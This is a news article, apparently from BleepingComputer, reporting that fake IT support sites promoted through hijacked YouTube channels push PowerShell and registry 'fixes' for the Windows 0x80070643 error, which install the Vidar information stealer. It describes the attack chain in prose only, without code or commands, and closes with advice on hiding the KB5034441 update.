First discovered by eSentire's Threat Response Unit, the fake support sites are promoted through YouTube channels that have been compromised and hijacked to add legitimacy to the content creator.
In particular, the threat actors are creating fake videos promoting a fix for the 0x80070643 error that millions of Windows users have been dealing with since January.
After installing the update, Windows users worldwide reported receiving '0x80070643 - ERROR INSTALL FAILURE' when attempting to install the update, which would not go away no matter how hard they tried.
It turns out that Windows Update is displaying an incorrect error message, as it was supposed to display a CBS E INSUFFICIENT DISK SPACE error on systems with a Windows Recovery Environment partition that's too small for the update to install.
Due to this, many are unable to install the security update and are left with the 0x80070643 error message every time they use Windows Update.
These errors have caused many frustrated Windows users to seek a solution online, allowing threat actors to capitalize on their search for a fix.
According to eSentire, threat actors are creating numerous fake IT support sites that are specifically designed to help users with common Windows errors, heavily focusing on the 0x80070643 error.
The researchers found two fake IT support sites promoted on YouTube named pchelprwizzards[.
Like the other videos eSentire found for the PCHelperWizard typo sites, BleepingComputer also found YouTube videos for the FixedGuides site, also promoting fixes for the 0x80070643 errors.
These sites all offer fixes that either require you to copy and run a PowerShell script or import the contents of a Windows Registry file.
eSentire's report outlines how the PCHelperWizard sites will walk users through copying a PowerShell script into the Windows Clipboard and execute it in a PowerShell prompt.
This PowerShell script contains a Base64 encoded script that will connect to a remote server to download another PowerShell script, which installs the Vidar information-stealing malware on the device.
The FixedGuides site does it a bit differently, using an obfuscated Windows Registry file to hide autostarts that launch a malicious PowerShell script.
When I extracted the strings from the above file, you can see that it contains a valid Registry file that adds a Windows autostart entry that runs a PowerShell script.
Using either fake fix will result in the information-stealing malware launching after Windows is restarted.
While Windows errors can be annoying, it is crucial to download software and fixes only from trusted websites, not from random videos and websites with little or no reputation.
As for the 0x80070643 errors, if you are unable to resize the WinRE partition, your best bet is to use Microsoft's Show or Hide Tool to hide the KB5034441 update so that Windows Update no longer offers it on your system and not search on the Internet for a magic fix.
Automate Windows tasks with $58 off this PowerShell training bundle.
Scathing report on Medibank cyberattack highlights unenforced MFA. Fake Google Chrome errors trick you into running malicious PowerShell scripts.
Microsoft delays Windows Recall amid privacy and security concerns.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Sun, 30 Jun 2024 14:35:28 +0000